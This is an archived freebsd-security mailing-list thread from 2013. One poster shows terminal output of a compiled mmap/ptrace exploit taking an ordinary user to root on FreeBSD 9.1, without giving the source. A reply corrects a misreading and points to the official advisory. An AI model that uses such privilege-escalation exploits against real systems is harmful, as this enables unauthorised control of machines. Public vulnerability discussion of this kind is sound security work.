Hunger
2013-Jun-19 21:32 UTC
Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)
$ uname -a FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec 4 09:23:10 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64 $ id uid=1001(hunger) gid=1002(hunger) groups=1002(hunger) $ gcc fbsd9lul.c -o fbsd9lul $ ./fbsd9lul FreeBSD 9.{0,1} mmap/ptrace exploit by Hunger <fbsd9lul@hunger.hu> # id uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger) # _______________________________________________ freebsd-security@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-security To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org"
Sergio Tam
2013-Jun-20 00:13 UTC
Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)
2013/6/19 Oliver Pinter <oliver.pntr at gmail.com>:> Hi Sergio! > > This exploit is not against NMAP, it is against MMAP FreeBSD system call. > > See this: http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.ascHello Oliver Oh. I need to buy lenses Thans for the observation. Regards.